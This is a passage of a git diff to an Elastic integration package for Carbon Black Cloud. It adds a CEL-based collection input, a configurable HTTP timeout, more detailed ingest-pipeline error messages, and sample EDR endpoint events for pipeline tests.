state.?cursor.processed_num_rows.orValue(0), + "rows": 1000, + }.encode_json(), + }).do_request().as(resp, bytes(resp.Body).decode_json().as(body, { + "events": body.results.map(e, { + "message": e.encode_json(), + }), + "cursor": { + ?"processed_num_rows": ( + has(body.results) && body.results.size() >= 1000 ? + optional.of(state.?cursor.processed_num_rows.orValue(0) + 1000) + : + state.?cursor.processed_num_rows + ) + }, + "want_more": has(body.results) && body.results.size() >= 1000, + "api_key": state.api_key, + })) +tags: +{{#if preserve_original_event}} + - preserve_original_event +{{/if}} +{{#each tags as |tag|}} + - {{tag}} +{{/each}} +{{#contains "forwarded" tags}} +publisher_pipeline.disable_host: true +{{/contains}} +{{#if processors}} +processors: +{{processors}} +{{/if}} diff --git a/packages/carbon_black_cloud/data_stream/asset_vulnerability_summary/agent/stream/httpjson.yml.hbs b/packages/carbon_black_cloud/data_stream/asset_vulnerability_summary/agent/stream/httpjson.yml.hbs index 737d6511c62..d01ab8df6ce 100644 --- a/packages/carbon_black_cloud/data_stream/asset_vulnerability_summary/agent/stream/httpjson.yml.hbs +++ b/packages/carbon_black_cloud/data_stream/asset_vulnerability_summary/agent/stream/httpjson.yml.hbs @@ -1,6 +1,9 @@ config_version: 2 interval: {{interval}} request.method: POST +{{#if http_client_timeout}} +request.timeout: {{http_client_timeout}} +{{/if}} {{#if enable_request_tracer}} request.tracer.filename: "../../logs/httpjson/http-request-trace-*.ndjson" request.tracer.maxbackups: 5 @@ -24,7 +27,6 @@ request.transforms: target: body.rows value: '10000' value_type: int -request.timeout: 2m response.pagination: - set: target: body.start diff --git a/packages/carbon_black_cloud/data_stream/asset_vulnerability_summary/elasticsearch/ingest_pipeline/default.yml b/packages/carbon_black_cloud/data_stream/asset_vulnerability_summary/elasticsearch/ingest_pipeline/default.yml index fb51ae35732..8c4d03e7b32 100644 --- a/packages/carbon_black_cloud/data_stream/asset_vulnerability_summary/elasticsearch/ingest_pipeline/default.yml +++ b/packages/carbon_black_cloud/data_stream/asset_vulnerability_summary/elasticsearch/ingest_pipeline/default.yml @@ -65,7 +65,7 @@ processors: field: json.highest_risk_score - append: field: error.message - value: '{{{_ingest.on_failure_message}}}' + value: 'Processor {{{_ingest.on_failure_processor_type}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' - rename: field: json.severity target_field: vulnerability.severity @@ -81,7 +81,7 @@ processors: field: json.last_sync_ts - append: field: error.message - value: '{{{_ingest.on_failure_message}}}' + value: 'Processor {{{_ingest.on_failure_processor_type}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' - rename: field: json.sync_status target_field: carbon_black_cloud.asset_vulnerability_summary.sync.status @@ -112,7 +112,7 @@ processors: field: json.vuln_count - append: field: error.message - value: '{{{_ingest.on_failure_message}}}' + value: 'Processor {{{_ingest.on_failure_processor_type}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' - remove: field: - json.last_sync_ts @@ -159,4 +159,4 @@ on_failure: value: pipeline_error - append: field: error.message - value: '{{{_ingest.on_failure_message}}}' + value: 'Processor {{{_ingest.on_failure_processor_type}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' diff --git a/packages/carbon_black_cloud/data_stream/asset_vulnerability_summary/manifest.yml b/packages/carbon_black_cloud/data_stream/asset_vulnerability_summary/manifest.yml index afa402554a2..522d2e6ed1b 100644 --- a/packages/carbon_black_cloud/data_stream/asset_vulnerability_summary/manifest.yml +++ b/packages/carbon_black_cloud/data_stream/asset_vulnerability_summary/manifest.yml @@ -14,6 +14,61 @@ streams: required: true show_user: true default: 1h + - name: http_client_timeout + type: text + title: HTTP Client Timeout + description: Duration before declaring that the HTTP client connection has timed out. Valid time units are ns, us, ms, s, m, h. + multi: false + required: false + show_user: true + default: 2m + - name: tags + type: text + title: Tags + multi: true + required: true + show_user: false + default: + - forwarded + - carbon_black_cloud-asset_vulnerability_summary + - name: preserve_original_event + required: true + show_user: true + title: Preserve original event + description: Preserves a raw copy of the original event, added to the field `event.original`. + type: bool + multi: false + default: false + - name: processors + type: yaml + title: Processors + multi: false + required: false + show_user: false + description: > + Processors are used to reduce the number of fields in the exported event or to enhance the event with metadata. This executes in the agent before the logs are parsed. See [Processors](https://www.elastic.co/guide/en/beats/filebeat/current/filtering-and-enhancing-data.html) for details. + + - input: cel + title: Collect asset vulnerability summary from Carbon Black Cloud + description: Collect asset vulnerability summary from Carbon Black Cloud. + template_path: cel.yml.hbs + vars: + - name: interval + type: text + title: Interval + description: Interval to query asset vulnerability summary in Carbon Black Cloud. Supported units for this parameter are h/m/s. + multi: false + required: true + show_user: true + default: 1h + - name: http_client_timeout + type: text + title: HTTP Client Timeout + description: Duration before declaring that the HTTP client connection has timed out. Valid time units are ns, us, ms, s, m, h. + multi: false + required: false + show_user: true + default: 2m - name: tags type: text title: Tags diff --git a/packages/carbon_black_cloud/data_stream/asset_vulnerability_summary/sample_event.json b/packages/carbon_black_cloud/data_stream/asset_vulnerability_summary/sample_event.json index f3b6563ed21..c32a955c97f 100644 --- a/packages/carbon_black_cloud/data_stream/asset_vulnerability_summary/sample_event.json +++ b/packages/carbon_black_cloud/data_stream/asset_vulnerability_summary/sample_event.json @@ -73,4 +73,4 @@ }, "severity": "CRITICAL" } -} +} \ No newline at end of file diff --git a/packages/carbon_black_cloud/data_stream/audit/_dev/test/system/test-cel-config.yml b/packages/carbon_black_cloud/data_stream/audit/_dev/test/system/test-cel-config.yml new file mode 100644 index 00000000000..ff03928cbb3 --- /dev/null +++ b/packages/carbon_black_cloud/data_stream/audit/_dev/test/system/test-cel-config.yml @@ -0,0 +1,11 @@ +input: cel +service: carbon_black_cloud +vars: + hostname: http://{{Hostname}}:{{Port}} + org_key: xxxx + custom_api_id: xxxx + custom_api_secret_key: xxxx +data_stream: + vars: + preserve_original_event: true + enable_request_tracer: true diff --git a/packages/carbon_black_cloud/data_stream/audit/_dev/test/system/test-default-config.yml b/packages/carbon_black_cloud/data_stream/audit/_dev/test/system/test-httpjson-config.yml similarity index 100% rename from packages/carbon_black_cloud/data_stream/audit/_dev/test/system/test-default-config.yml rename to packages/carbon_black_cloud/data_stream/audit/_dev/test/system/test-httpjson-config.yml diff --git a/packages/carbon_black_cloud/data_stream/audit/agent/stream/cel.yml.hbs b/packages/carbon_black_cloud/data_stream/audit/agent/stream/cel.yml.hbs new file mode 100644 index 00000000000..03cde15eaaf --- /dev/null +++ b/packages/carbon_black_cloud/data_stream/audit/agent/stream/cel.yml.hbs @@ -0,0 +1,43 @@ +config_version: 2 +interval: {{interval}} +{{#if enable_request_tracer}} +resource.tracer.filename: "../../logs/httpjson/http-request-trace-*.ndjson" +resource.tracer.maxbackups: 5 +{{/if}} +{{#if proxy_url}} +resource.proxy_url: {{proxy_url}} +{{/if}} +{{#if ssl}} +resource.ssl: {{ssl}} +{{/if}} +resource.url: {{hostname}}/integrationServices/v3/auditlogs +state: + api_key: '{{custom_api_secret_key}}/{{custom_api_id}}' +redact: + fields: + - api_key +program: | + request("GET", (state.url)).with({ + "Header":{ + "Content-Type": ["application/json"], + "X-Auth-Token": [state.api_key], + }, + }).do_request().as(resp, bytes(resp.Body).decode_json().as(body, { + "events": body.notifications.map(e, { + "message": e.encode_json(), + }), + })) +tags: +{{#if preserve_original_event}} + - preserve_original_event +{{/if}} +{{#each tags as |tag|}} + - {{tag}} +{{/each}} +{{#contains "forwarded" tags}} +publisher_pipeline.disable_host: true +{{/contains}} +{{#if processors}} +processors: +{{processors}} +{{/if}} diff --git a/packages/carbon_black_cloud/data_stream/audit/elasticsearch/ingest_pipeline/default.yml b/packages/carbon_black_cloud/data_stream/audit/elasticsearch/ingest_pipeline/default.yml index 3357178e4c3..ccc81302fd7 100644 --- a/packages/carbon_black_cloud/data_stream/audit/elasticsearch/ingest_pipeline/default.yml +++ b/packages/carbon_black_cloud/data_stream/audit/elasticsearch/ingest_pipeline/default.yml @@ -23,7 +23,7 @@ processors: field: json.eventTime - append: field: error.message - value: '{{{_ingest.on_failure_message}}}' + value: 'Processor {{{_ingest.on_failure_processor_type}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' - set: field: event.kind value: event @@ -40,7 +40,7 @@ processors: field: json.flagged - append: field: error.message - value: '{{{_ingest.on_failure_message}}}' + value: 'Processor {{{_ingest.on_failure_processor_type}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' - set: field: event.outcome value: failure @@ -59,7 +59,7 @@ processors: field: json.clientIp - append: field: error.message - value: '{{{_ingest.on_failure_message}}}' + value: 'Processor {{{_ingest.on_failure_processor_type}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' - append: field: related.ip value: '{{{client.ip}}}' @@ -92,7 +92,7 @@ processors: field: json.verbose - append: field: error.message - value: '{{{_ingest.on_failure_message}}}' + value: 'Processor {{{_ingest.on_failure_processor_type}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' - remove: field: json ignore_missing: true @@ -124,4 +124,4 @@ on_failure: value: pipeline_error - append: field: error.message - value: '{{{_ingest.on_failure_message}}}' + value: 'Processor {{{_ingest.on_failure_processor_type}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' diff --git a/packages/carbon_black_cloud/data_stream/audit/manifest.yml b/packages/carbon_black_cloud/data_stream/audit/manifest.yml index 5d0238e7087..00d34d1ba1f 100644 --- a/packages/carbon_black_cloud/data_stream/audit/manifest.yml +++ b/packages/carbon_black_cloud/data_stream/audit/manifest.yml @@ -40,3 +40,41 @@ streams: description: > Processors are used to reduce the number of fields in the exported event or to enhance the event with metadata. This executes in the agent before the logs are parsed. See [Processors](https://www.elastic.co/guide/en/beats/filebeat/current/filtering-and-enhancing-data.html) for details. + - input: cel + title: Collect audit logs from Carbon Black Cloud + description: Collect audit logs from Carbon Black Cloud. + template_path: cel.yml.hbs + vars: + - name: interval + type: text + title: Interval + description: Interval to fetch audit logs from Carbon Black Cloud. Supported units for this parameter are h/m/s. + multi: false + required: true + show_user: true + default: 1m + - name: tags + type: text + title: Tags + multi: true + required: true + show_user: false + default: + - forwarded + - carbon_black_cloud-audit + - name: preserve_original_event + required: true + show_user: true + title: Preserve original event + description: Preserves a raw copy of the original event, added to the field `event.original`. + type: bool + multi: false + default: false + - name: processors + type: yaml + title: Processors + multi: false + required: false + show_user: false + description: >- + Processors are used to reduce the number of fields in the exported event or to enhance the event with metadata. This executes in the agent before the logs are parsed. See [Processors](https://www.elastic.co/guide/en/beats/filebeat/current/filtering-and-enhancing-data.html) for details. diff --git a/packages/carbon_black_cloud/data_stream/audit/sample_event.json b/packages/carbon_black_cloud/data_stream/audit/sample_event.json index 852fe377add..23b9ae866cf 100644 --- a/packages/carbon_black_cloud/data_stream/audit/sample_event.json +++ b/packages/carbon_black_cloud/data_stream/audit/sample_event.json @@ -59,4 +59,4 @@ "forwarded", "carbon_black_cloud-audit" ] -} +} \ No newline at end of file diff --git a/packages/carbon_black_cloud/data_stream/endpoint_event/_dev/test/pipeline/test-endpoint-event.log b/packages/carbon_black_cloud/data_stream/endpoint_event/_dev/test/pipeline/test-endpoint-event.log index 619b1a6694a..bf0fba5f89b 100644 --- a/packages/carbon_black_cloud/data_stream/endpoint_event/_dev/test/pipeline/test-endpoint-event.log +++ b/packages/carbon_black_cloud/data_stream/endpoint_event/_dev/test/pipeline/test-endpoint-event.log @@ -11,5 +11,10 @@ {"type":"endpoint.event.filemod","process_guid":"XXXXXXXX-003d902d-00000694-00000000-1d7540221dedd62","parent_guid":"XXXXXXXX-003d902d-00000280-00000000-1d74d6bb1e536c7","backend_timestamp":"2022-02-10 11:52:50 +0000 UTC","org_key":"XXXXXXXX","device_id":"11","device_name":"DESKTOP-011","device_external_ip":"67.43.156.13","device_os":"WINDOWS","device_group":"","action":"ACTION_FILE_MOD_OPEN | ACTION_FILE_OPEN_DELETE","schema":1,"device_timestamp":"2022-02-10 11:51:35.4434036 +0000 UTC","process_terminated":false,"process_reputation":"REP_RESOLVING","parent_reputation":"REP_RESOLVING","process_pid":1684,"parent_pid":640,"process_publisher":[{"name":"Microsoft Corporation","state":"FILE_SIGNATURE_STATE_SIGNED | FILE_SIGNATURE_STATE_VERIFIED | FILE_SIGNATURE_STATE_TRUSTED"}],"process_path":"c:\\windowsazure\\guestagent_2.7.41491.1010_2021-05-11_233023\\guestagent\\windowsazureguestagent.exe","parent_path":"c:\\windows\\system32\\services.exe","process_hash":["03dd698da2671383c9b4f868c9931879","44a1975b2197484bb22a0eb673e67e7ee9ec20265e9f6347f5e06b6447ac82c5"],"parent_hash":["fae441a6ec7fd8f55a404797a25c8910","70d7571253e091f646f78a4dd078ce7fe8d796625bfa3c0a466df03971175fb4"],"process_cmdline":"C:\\WindowsAzure\\GuestAgent_2.7.41491.1010_2021-05-11_233023\\GuestAgent\\WindowsAzureGuestAgent.exe","parent_cmdline":"C:\\windows\\system32\\services.exe","process_username":"NT AUTHORITY\\SYSTEM","sensor_action":"ACTION_ALLOW","event_origin":"EDR","filemod_hash":["",""],"filemod_name":"c:\\windowsazure\\logs\\aggregatestatus\\aggregatestatus_20220210114710865.json"} {"type":"endpoint.event.filemod","process_guid":"XXXXXXXX-003dd2d5-00000a24-00000000-1d81e7447aed7aa","parent_guid":"XXXXXXXX-003dd2d5-00000ce4-00000000-1d7d6729f74b35a","backend_timestamp":"2022-02-10 11:50:50 +0000 UTC","org_key":"XXXXXXXX","device_id":"13","device_name":"DESKTOP-012","device_external_ip":"67.43.156.14","device_os":"WINDOWS","device_group":"","action":"ACTION_FILE_MOD_OPEN | ACTION_FILE_OPEN_READ | ACTION_FILE_OPEN_WRITE","schema":1,"device_timestamp":"2022-02-10 11:49:37.5392491 +0000 UTC","process_terminated":false,"process_reputation":"REP_RESOLVING","parent_reputation":"REP_RESOLVING","process_pid":2596,"parent_pid":3300,"process_publisher":[{"name":"Carbon Black, Inc.","state":"FILE_SIGNATURE_STATE_SIGNED | FILE_SIGNATURE_STATE_VERIFIED | FILE_SIGNATURE_STATE_TRUSTED"}],"process_path":"c:\\program files\\confer\\scanner\\scanhost.exe","parent_path":"c:\\program files\\confer\\repmgr.exe","process_hash":["cc18cc5d6af91226548e9049d0ea87ca","8d6ce40a49b5469a7c77aa9806be32b7d50f8f3ab8a89541750aaa0ae74b7c32"],"parent_hash":["472829d6813a5a85e3017db7d1c0d67e","903ae6b93c722f8862cc774068f284ba0d6daa823499212f1048db98255fb395"],"process_cmdline":"\"C:\\Program Files\\Confer\\scanner\\scanhost.exe\"","parent_cmdline":"\"C:\\Program Files\\Confer\\RepMgr.exe\"","process_username":"NT AUTHORITY\\SYSTEM","sensor_action":"ACTION_ALLOW","event_origin":"EDR","filemod_hash":["",""],"filemod_name":"c:\\programdata\\carbonblack\\logs\\scanhost.log"} {"type":"endpoint.event.netconn","process_guid":"XXXXXXXX-003dd2d5-00000344-00000000-1d81e74160752cc","parent_guid":"XXXXXXXX-003dd2d5-00000ce4-00000000-1d7d6729f74b35a","backend_timestamp":"2022-02-10 11:50:50 +0000 UTC","org_key":"XXXXXXXX","device_id":"12","device_name":"DESKTOP-013","device_external_ip":"67.43.156.14","device_os":"WINDOWS","device_group":"","action":"ACTION_CONNECTION_CREATE","schema":1,"device_timestamp":"2022-02-10 11:48:14.2785426 +0000 UTC","process_terminated":false,"process_reputation":"REP_RESOLVING","parent_reputation":"REP_RESOLVING","process_pid":836,"parent_pid":3300,"process_publisher":[{"name":"Carbon Black, Inc.","state":"FILE_SIGNATURE_STATE_SIGNED | FILE_SIGNATURE_STATE_VERIFIED | FILE_SIGNATURE_STATE_TRUSTED"}],"process_path":"c:\\program files\\confer\\scanner\\scanhost.exe","parent_path":"c:\\program files\\confer\\repmgr.exe","process_hash":["cc18cc5d6af91226548e9049d0ea87ca","8d6ce40a49b5469a7c77aa9806be32b7d50f8f3ab8a89541750aaa0ae74b7c32"],"parent_hash":["472829d6813a5a85e3017db7d1c0d67e","903ae6b93c722f8862cc774068f284ba0d6daa823499212f1048db98255fb395"],"process_cmdline":"\"C:\\Program Files\\Confer\\scanner\\scanhost.exe\"","parent_cmdline":"\"C:\\Program Files\\Confer\\RepMgr.exe\"","process_username":"NT AUTHORITY\\SYSTEM","sensor_action":"ACTION_ALLOW","event_origin":"EDR","remote_port":49707,"remote_ip":"127.0.0.1","local_port":62909,"local_ip":"127.0.0.1","netconn_domain":"","netconn_inbound":false,"netconn_protocol":"PROTO_TCP"} -{"type":"endpoint.event.netconn","process_guid":"XXXXXXXX-00442a47-00002328-00000000-1d81e73a30955e7","parent_guid":"XXXXXXXX-00442a47-000002d0-00000000-1d807560b2edfc4","backend_timestamp":"2022-02-10 11:49:36 +0000 UTC","org_key":"XXXXXXXX","device_id":"14","device_name":"DESKTOP-014","device_external_ip":"67.43.156.12","device_os":"WINDOWS","device_group":"","action":"ACTION_CONNECTION_LISTEN","schema":1,"device_timestamp":"2022-02-10 11:45:02.8882089 +0000 UTC","process_terminated":false,"process_reputation":"REP_RESOLVING","parent_reputation":"REP_RESOLVING","process_pid":9000,"parent_pid":720,"process_publisher":[{"name":"Stellar Cyber Inc","state":"FILE_SIGNATURE_STATE_SIGNED | FILE_SIGNATURE_STATE_VERIFIED | FILE_SIGNATURE_STATE_TRUSTED"}],"process_path":"c:\\program files\\aella\\aella_conf_win_srv\\aella_conf_win_srv.exe","parent_path":"c:\\windows\\system32\\services.exe","process_hash":["6174da1a2dd7594456bbb3ae50ac5587","2ad7d1a17ee2dd897a5a45515e5ae46f8b6b61d3f67c90c1fa0c7910f06d0515"],"parent_hash":["d8e577bf078c45954f4531885478d5a9","dfbea9e8c316d9bc118b454b0c722cd674c30d0a256340200e2c3a7480cba674"],"process_cmdline":"\"C:\\Program Files\\Aella\\aella_conf_win_srv\\aella_conf_win_srv.exe\"","parent_cmdline":"C:\\WINDOWS\\system32\\services.exe","process_username":"NT AUTHORITY\\SYSTEM","sensor_action":"ACTION_ALLOW","event_origin":"EDR","remote_port":0,"remote_ip":"127.0.0.1","local_port":9716,"local_ip":"127.0.0.1","netconn_domain":"","netconn_inbound":false,"netconn_protocol":"PROTO_TCP"} +{"type":"endpoint.event.netconn","process_guid":"XXXXXXXX-00442a47-00002328-00000000-1d81e73a30955e7","parent_guid":"XXXXXXXX-00442a47-000002d0-00000000-1d807560b2edfc4","backend_timestamp":"2022-02-10 11:49:36 +0000 UTC","org_key":"XXXXXXXX","device_id":"14","device_name":"DESKTOP-014","device_external_ip":"67.43.156.12","device_os":"WINDOWS","device_group":"","action":"ACTION_CONNECTION_LISTEN","schema":1,"device_timestamp":"2022-02-10 11:45:02.8882089 +0000 UTC","process_terminated":false,"process_reputation":"REP_RESOLVING","parent_reputation":"REP_RESOLVING","process_pid":9000,"parent_pid":720,"process_publisher":[{"name":"Stellar Cyber Inc","state":"FILE_SIGNATURE_STATE_SIGNED | FILE_SIGNATURE_STATE_VERIFIED | FILE_SIGNATURE_STATE_TRUSTED"}],"process_path":"c:\\program files\\aella\\aella_conf_win_srv\\aella_conf_win_srv.exe","parent_path":"c:\\windows\\system32\\services.exe","process_hash":["6174da1a2dd7594456bbb3ae50ac5587","2ad7d1a17ee2dd897a5a45515e5ae46f8b6b61d3f67c90c1fa0c7910f06d0515"],"parent_hash":["d8e577bf078c45954f4531885478d5a9","dfbea9e8c316d9bc118b454b0c722cd674c30d0a256340200e2c3a7480cba674"],"process_cmdline":"\"C:\\Program Files\\Aella\\aella_conf_win_srv\\aella_conf_win_srv.exe\"","parent_cmdline":"C:\\WINDOWS\\system32\\services.exe","process_username":"NT AUTHORITY\\SYSTEM","sensor_action":"ACTION_ALLOW","event_origin":"EDR","remote_port":9001,"remote_ip":"67.43.156.14","local_port":9716,"local_ip":"127.0.0.1","netconn_domain":"","netconn_inbound":false,"netconn_protocol":"PROTO_TCP"} +{"type":"endpoint.event.netconn","process_guid":"XXXXXXXX-00442a47-00002328-00000000-1d81e73a30955e7","parent_guid":"XXXXXXXX-00442a47-000002d0-00000000-1d807560b2edfc4","backend_timestamp":"2022-02-10 11:49:36 +0000 UTC","org_key":"XXXXXXXX","device_id":"14","device_name":"DESKTOP-014","device_external_ip":"67.43.156.12","device_os":"WINDOWS","device_group":"","action":"ACTION_CONNECTION_LISTEN","schema":1,"device_timestamp":"2022-02-10 11:45:02.8882089 +0000 UTC","process_terminated":false,"process_reputation":"REP_RESOLVING","parent_reputation":"REP_RESOLVING","process_pid":9000,"parent_pid":720,"process_publisher":[{"name":"Stellar Cyber Inc","state":"FILE_SIGNATURE_STATE_SIGNED | FILE_SIGNATURE_STATE_VERIFIED | FILE_SIGNATURE_STATE_TRUSTED"}],"process_path":"c:\\program files\\aella\\aella_conf_win_srv\\aella_conf_win_srv.exe","parent_path":"c:\\windows\\system32\\services.exe","process_hash":["6174da1a2dd7594456bbb3ae50ac5587","2ad7d1a17ee2dd897a5a45515e5ae46f8b6b61d3f67c90c1fa0c7910f06d0515"],"parent_hash":["d8e577bf078c45954f4531885478d5a9","dfbea9e8c316d9bc118b454b0c722cd674c30d0a256340200e2c3a7480cba674"],"process_cmdline":"\"C:\\Program Files\\Aella\\aella_conf_win_srv\\aella_conf_win_srv.exe\"","parent_cmdline":"C:\\WINDOWS\\system32\\services.exe","process_username":"NT AUTHORITY\\SYSTEM","sensor_action":"ACTION_ALLOW","event_origin":"EDR","remote_port":9001,"remote_ip":"67.43.156.14","local_port":9716,"local_ip":"127.0.0.1","netconn_domain":"","netconn_inbound":true,"netconn_protocol":"PROTO_TCP"} {"type":"endpoint.event.scriptload","process_guid":"XXXXXXXX-004e050d-000011f8-00000000-1d81e740ff3ff32","parent_guid":"XXXXXXXX-004e050d-00001a48-00000000-1d81e206b2e4f49","backend_timestamp":"2022-02-10 11:48:51 +0000 UTC","org_key":"XXXXXXXX","device_id":"15","device_name":"DESKTOP-015","device_external_ip":"89.160.20.156","device_os":"WINDOWS","device_group":"","action":"ACTION_LOAD_SCRIPT","schema":1,"device_timestamp":"2022-02-10 11:48:05.2725926 +0000 UTC","process_terminated":false,"process_reputation":"REP_RESOLVING","parent_reputation":"REP_RESOLVING","process_pid":4600,"parent_pid":6728,"process_publisher":[{"name":"Microsoft Windows","state":"FILE_SIGNATURE_STATE_SIGNED | FILE_SIGNATURE_STATE_VERIFIED | FILE_SIGNATURE_STATE_TRUSTED | FILE_SIGNATURE_STATE_OS | FILE_SIGNATURE_STATE_CATALOG_SIGNED"}],"process_path":"c:\\windows\\system32\\cscript.exe","parent_path":"c:\\program files\\microsoft monitoring agent\\agent\\monitoringhost.exe","process_hash":["24590bf74bbbbfd7d7ac070f4e3c44fd","ae37fd1b642e797b36b9ffcec8a6e986732d011681061800c6b74426c28a9d03"],"parent_hash":["2d287989c6f60fa434a345b79b919755","f66196626700ae0728c0269febf2c194f9b73c49dfe7f4fa869d3b96334e5d89"],"process_cmdline":"\"C:\\WINDOWS\\system32\\cscript.exe\" /nologo \"MonitorKnowledgeDiscovery.vbs\"","parent_cmdline":"\"C:\\Program Files\\Microsoft Monitoring Agent\\Agent\\MonitoringHost.exe\" -Embedding","process_username":"NT AUTHORITY\\SYSTEM","sensor_action":"ACTION_ALLOW","event_origin":"EDR","scriptload_count":1,"scriptload_reputation":"REP_RESOLVING","scriptload_effective_reputation":"REP_NOT_LISTED","scriptload_publisher":[{"state":"FILE_SIGNATURE_STATE_NOT_SIGNED"}]} +{"type":"endpoint.event.scriptload","process_guid":"XXXXXXXX-004e050d-000011f8-00000000-1d81e740ff3ff33","parent_guid":"XXXXXXXX-004e050d-00001a48-00000000-1d81e206b2e4f49","backend_timestamp":"2022-02-10 11:48:51 +0000 UTC","org_key":"XXXXXXXX","device_id":"16","device_name":"DESKTOP-015","device_external_ip":"89.160.20.156","device_os":"WINDOWS","device_group":"","action":"ACTION_LOAD_SCRIPT","schema":1,"device_timestamp":"2022-02-10 11:48:05.2725926 +0000 UTC","create_time": "2022-02-10T08:03:29.540Z","process_terminated":false,"process_reputation":"REP_RESOLVING","parent_reputation":"REP_RESOLVING","process_pid":4600,"parent_pid":6728,"process_publisher":[{"name":"Microsoft Windows","state":"FILE_SIGNATURE_STATE_SIGNED | FILE_SIGNATURE_STATE_VERIFIED | FILE_SIGNATURE_STATE_TRUSTED | FILE_SIGNATURE_STATE_OS | FILE_SIGNATURE_STATE_CATALOG_SIGNED"}],"process_path":"c:\\windows\\system32\\cscript.exe","parent_path":"c:\\program files\\microsoft monitoring agent\\agent\\monitoringhost.exe","process_hash":["24590bf74bbbbfd7d7ac070f4e3c44fd","ae37fd1b642e797b36b9ffcec8a6e986732d011681061800c6b74426c28a9d03"],"parent_hash":["2d287989c6f60fa434a345b79b919755","f66196626700ae0728c0269febf2c194f9b73c49dfe7f4fa869d3b96334e5d89"],"process_cmdline":"\"C:\\WINDOWS\\system32\\cscript.exe\" /nologo \"MonitorKnowledgeDiscovery.vbs\"","parent_cmdline":"\"C:\\Program Files\\Microsoft Monitoring Agent\\Agent\\MonitoringHost.exe\" -Embedding","process_username":"NT AUTHORITY\\SYSTEM","sensor_action":"ACTION_ALLOW","event_origin":"EDR","scriptload_count":1,"scriptload_reputation":"REP_RESOLVING","scriptload_effective_reputation":"REP_NOT_LISTED","scriptload_publisher":[{"state":"FILE_SIGNATURE_STATE_NOT_SIGNED"}]} +{"type":"endpoint.event.scriptload","process_guid":"XXXXXXXX-004e050d-000011f8-00000000-1d81e740ff3ff33","parent_guid":"XXXXXXXX-004e050d-00001a48-00000000-1d81e206b2e4f49","backend_timestamp":"2022-02-10 11:48:51 +0000 UTC","org_key":"XXXXXXXX","device_id":"16","device_name":"DESKTOP-015","device_external_ip":"89.160.20.156","device_os":"WINDOWS","device_group":"","action":"ACTION_LOAD_SCRIPT","schema":1,"device_timestamp":"2022-02-10 11:48:05.272 +0000 UTC","create_time": "2022-02-10T08:03:29.540Z","process_terminated":false,"process_reputation":"REP_RESOLVING","parent_reputation":"REP_RESOLVING","process_pid":4600,"parent_pid":6728,"process_publisher":[{"name":"Microsoft Windows","state":"FILE_SIGNATURE_STATE_SIGNED | FILE_SIGNATURE_STATE_VERIFIED | FILE_SIGNATURE_STATE_TRUSTED | FILE_SIGNATURE_STATE_OS | FILE_SIGNATURE_STATE_CATALOG_SIGNED"}],"process_path":"c:\\windows\\system32\\cscript.exe","parent_path":"c:\\program files\\microsoft monitoring agent\\agent\\monitoringhost.exe","process_hash":["24590bf74bbbbfd7d7ac070f4e3c44fd","ae37fd1b642e797b36b9ffcec8a6e986732d011681061800c6b74426c28a9d03"],"parent_hash":["2d287989c6f60fa434a345b79b919755","f66196626700ae0728c0269febf2c194f9b73c49dfe7f4fa869d3b96334e5d89"],"process_cmdline":"\"C:\\WINDOWS\\system32\\cscript.exe\" /nologo \"MonitorKnowledgeDiscovery.vbs\"","parent_cmdline":"\"C:\\Program Files\\Microsoft Monitoring Agent\\Agent\\MonitoringHost.exe\" -Embedding","process_username":"NT AUTHORITY\\SYSTEM","sensor_action":"ACTION_ALLOW","event_origin":"EDR","scriptload_count":1,"scriptload_reputation":"REP_RESOLVING","scriptload_effective_reputation":"REP_NOT_LISTED","scriptload_publisher":[{"state":"FILE_SIGNATURE_STATE_NOT_SIGNED"}]} +{"type":"endpoint.event.scriptload","process_guid":"XXXXXXXX-004e050d-000011f8-00000000-1d81e740ff3ff33","parent_guid":"XXXXXXXX-004e050d-00001a48-00000000-1d81e206b2e4f49","backend_timestamp":"2022-02-10 11:48:51 +0000 UTC","org_key":"XXXXXXXX","device_id":"16","device_name":"DESKTOP-015","device_external_ip":"89.160.20.156","device_os":"WINDOWS","device_group":"","action":"ACTION_LOAD_SCRIPT","schema":1,"device_timestamp":"2022-02-10 11:48:05.2 +0000 UTC","create_time": "2022-02-10T08:03:29.540Z","process_terminated":false,"process_reputation":"REP_RESOLVING","parent_reputation":"REP_RESOLVING","process_pid":4600,"parent_pid":6728,"process_publisher":[{"name":"Microsoft Windows","state":"FILE_SIGNATURE_STATE_SIGNED | FILE_SIGNATURE_STATE_VERIFIED | FILE_SIGNATURE_STATE_TRUSTED | FILE_SIGNATURE_STATE_OS | FILE_SIGNATURE_STATE_CATALOG_SIGNED"}],"process_path":"c:\\windows\\system32\\cscript.exe","parent_path":"c:\\program files\\microsoft monitoring agent\\agent\\monitoringhost.exe","process_hash":["24590bf74bbbbfd7d7ac070f4e3c44fd","ae37fd1b642e797b36b9ffcec8a6e986732d011681061800c6b74426c28a9d03"],"parent_hash":["2d287989c6f60fa434a345b79b919755","f66196626700ae0728c0269febf2c194f9b73c49dfe7f4fa869d3b96334e5d89"],"process_cmdline":"\"C:\\WINDOWS\\system32\\cscript.exe\" /nologo \"MonitorKnowledgeDiscovery.vbs\"","parent_cmdline":"\"C:\\Program Files\\Microsoft Monitoring Agent\\Agent\\MonitoringHost.exe\" -Embedding","process_username":"NT AUTHORITY\\SYSTEM","sensor_action":"ACTION_ALLOW","event_origin":"EDR","scriptload_count":1,"scriptload_reputation":"REP_RESOLVING","scriptload_effective_reputation":"REP_NOT_LISTED","scriptload_publisher":[{"state":"FILE_SIGNATURE_STATE_NOT_SIGNED"}]} +{"type":"endpoint.event.scriptload","process_guid":"XXXXXXXX-004e050d-000011f8-00000000-1d81e740ff3ff33","parent_guid":"XXXXXXXX-004e050d-00001a48-00000000-1d81e206b2e4f49","backend_timestamp":"2022-02-10 11:48:51 +0000 